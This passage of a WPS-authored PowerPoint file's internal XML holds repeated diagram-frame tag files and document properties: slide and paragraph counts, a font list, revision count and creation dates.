  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag29.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag30.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag31.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag32.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag33.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.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6432</Words>
  <Application>WPS 文字</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>610</Paragraphs>
  <Slides>27</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27</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="46" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>腾讯体 W7</vt:lpstr>
      <vt:lpstr>苹方-简</vt:lpstr>
      <vt:lpstr>腾讯体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>汉仪旗黑</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>宋体-简</vt:lpstr>
      <vt:lpstr>Times New Roman Regular</vt:lpstr>
      <vt:lpstr>JetBrains Mono</vt:lpstr>
      <vt:lpstr>Thonburi</vt:lpstr>
      <vt:lpstr>JetBrains Mono</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>腾讯体 W7</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果酱的酱</cp:lastModifiedBy>
  <cp:revision>297</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-02T10:12:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-02T10:12:49Z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2052-12.1.22522.22522</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>D65576997F63433AA1BB2E69B0DE53C8_43</vt:lpwstr>
  </property>
</Properties>
</file>